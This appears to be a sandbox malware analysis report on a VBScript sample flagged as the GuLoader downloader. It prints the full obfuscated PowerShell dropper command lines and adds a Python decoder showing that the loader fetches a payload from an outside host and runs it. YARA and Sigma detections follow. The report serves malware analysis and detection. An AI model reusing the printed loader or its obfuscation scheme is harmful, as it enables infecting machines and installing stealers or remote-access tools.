Windows Analysis Report
Kostenvoranschlag.vbs

Overview

General Information

Sample name: Kostenvoranschlag.vbs
Analysis ID: 1541205
MD5: 080a163f1709fc1834429846644abf60
SHA1: 998d9f5a1e0c00788d623cec753e34180135eb0c
SHA256: 50a0b8b110c99e220f5872fc64fce72363511dcaae0a13a844537872ba349af3
Tags: vbs, user-lowmal3

Detection

GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7336 cmdline: ping Horm5zl_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. 
dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd= elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$ O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge .arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation) {Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar =Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu 
csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne (Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta ');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9 Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne $Pylorous69;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8108 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. 
dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd= elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$ O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge .arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation) {Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar =Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu 
csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne (Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta ');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9 Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne $Pylorous69;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
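The PowerShell stage in the tree above never writes a readable string: every literal goes through the helper Blaaklokkers, which keeps only the character at index 4, 9, 14, ... of its argument (the other four characters of each 5-character group are filler cut from Danish dictionary words), and Fritidsklubberne dot-sources its argument through $Festsale, which decodes to iEX. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample; it reproduces the decoder and runs it over literals copied from the command line above. It assumes that $host.UI is non-null (true in any real PowerShell host, so the loop bound is length - 1 and the trailing pad character is dropped) and that the URL literal, which the report prints across a line break, is joined with nothing in between; the result matches the GET /Perspectivist.snp to www.hotelseneca.ro recorded under Networking. One caveat for anyone working from the rendered page: the report's text extraction has dropped the Danish letters æ, ø and å (visible in identifiers such as $Koalabjrn and $Nrtagenhedens), and any literal that lost a filler character no longer lines up on the 5-character stride; the second literal appended to $Mellemstykket is one of those, so decode the raw command line captured by the sandbox rather than the page text.

```python
"""Decoder for the 5-character stride obfuscation in the PowerShell stage above.

Added example, not part of the Joe Sandbox report. The loader's helper
Blaaklokkers keeps every fifth character of its argument, starting at index 4:

    for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){ $Presartorial+=$Kmnings246[$Katina] }

with $Afvundnes = $Maleficium + length - $Koalabjrn. $Maleficium is never set
($null, i.e. 0) and $Koalabjrn is bumped to 1 whenever $host.UI is non-null,
which it is in any real PowerShell host, so the loop stops at length - 1 and
the trailing pad character is never copied. Fritidsklubberne dot-sources its
argument through $Festsale, which decodes to 'iEX'.
"""
import re

# Fragments copied from the powershell.exe command line in the process tree.
# The URL literal is printed across two lines by the report; the two halves are
# joined here with nothing in between (assumption, corroborated by the
# GET /Perspectivist.snp request to www.hotelseneca.ro under Networking).
EXCERPT = (
    "$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';"
    "$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';"
    "$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw "
    "SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. "
    "xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s "
    "EcltHapu.RibbsWienn ybgpUni ';"
    "$Vellumy=Blaaklokkers 'Pseu>Adre ';"
    "$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';"
    "$Befjelsernes='\\Commandoes.Gre';"
    "Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA "
    ".eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aa"
    "DermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');"
)

# One match per statement: an assignment (decoded if it goes through
# Blaaklokkers, raw otherwise) or a Fritidsklubberne(Blaaklokkers '...') call.
TOKEN_RE = re.compile(
    r"\$(?P<name>\w+)\s*(?P<op>\+?=)\s*(?P<dec>Blaaklokkers\s+)?'(?P<lit>[^']*)'"
    r"|Fritidsklubberne\s*\(\s*Blaaklokkers\s+'(?P<exec>[^']*)'\s*\)"
)
VAR_RE = re.compile(r"\$(\w+)")


def decode_stride(literal: str, host_ui_present: bool = True) -> str:
    """Reproduce Blaaklokkers: characters at index 4, 9, 14, ... below len - 1."""
    bound = len(literal) - (1 if host_ui_present else 0)
    return "".join(literal[i] for i in range(4, bound, 5))


def recover(script: str) -> dict:
    """Walk the script in order, decoding literals as the loader would.

    Returns {'vars': {name: value}, 'exec': [statement, ...]}, where each
    statement is what the loader hands to iEX. '+=' appends to the earlier
    value, which the loader relies on for literals it builds in pieces.
    """
    variables, statements = {}, []
    for m in TOKEN_RE.finditer(script):
        if m.group("exec") is not None:
            statements.append(decode_stride(m.group("exec")))
            continue
        value = decode_stride(m.group("lit")) if m.group("dec") else m.group("lit")
        name = m.group("name").lower()  # PowerShell variable names are case-insensitive
        variables[name] = (variables.get(name, "") + value) if m.group("op") == "+=" else value
    return {"vars": variables, "exec": statements}


def referenced(statement: str, variables: dict) -> dict:
    """Map every $Name in a decoded statement to its recovered value, if known."""
    return {v: variables[v.lower()] for v in VAR_RE.findall(statement) if v.lower() in variables}


if __name__ == "__main__":
    found = recover(EXCERPT)
    for name, value in found["vars"].items():
        print(f"${name} = {value!r}")
    for stmt in found["exec"]:
        print("iEX:", stmt, referenced(stmt, found["vars"]))
```

Run against the excerpt, the decoded values are the download URL, the header name User-Agent (the loader builds the Firefox User-Agent string separately), the redirection operator >, the string iEX, and one executed statement that sets $global:Balarao to $env:APPDATA plus \Commandoes.Gre, the path the second stage is written to. Recovering the remaining statements from the sandbox's raw command line is the same loop.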
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author
0000000D.00000002.2577384991.00000000088A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000D.00000002.2577528361.000000000A45F000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 7400 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
             Source | Rule | Description | Author
             amsi64_7400.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
             amsi64_7400.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xfe22:$b2: ::FromBase64String(
              • 0xd1c3:$s1: -join
              • 0x696f:$s4: +=
              • 0x6a31:$s4: +=
              • 0xac58:$s4: +=
              • 0xcd75:$s4: +=
              • 0xd05f:$s4: +=
              • 0xd1a5:$s4: +=
              • 0xe9a3:$s4: +=
              • 0xea23:$s4: +=
              • 0xeae9:$s4: +=
              • 0xeb69:$s4: +=
              • 0xed3f:$s4: +=
              • 0xedc3:$s4: +=
              • 0xf5e1:$e4: Get-WmiObject
              • 0xf7d0:$e4: Get-Process
              • 0xf828:$e4: Start-Process
              amsi32_8108.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xe18d:$b2: ::FromBase64String(
              • 0xb60f:$s1: -join
              • 0x4dbb:$s4: +=
              • 0x4e7d:$s4: +=
              • 0x90a4:$s4: +=
              • 0xb1c1:$s4: +=
              • 0xb4ab:$s4: +=
              • 0xb5f1:$s4: +=
              • 0xcdef:$s4: +=
              • 0xce6f:$s4: +=
              • 0xcf35:$s4: +=
              • 0xcfb5:$s4: +=
              • 0xd18b:$s4: +=
              • 0xd20f:$s4: +=
              • 0xda2d:$e4: Get-WmiObject
              • 0xdc1c:$e4: Get-Process
              • 0xdc74:$e4: Start-Process
              • 0x15d99:$e4: Get-Process

              System Summary

              Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", ProcessId: 7260, ProcessName: wscript.exe
              Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", ProcessId: 7260, ProcessName: wscript.exe
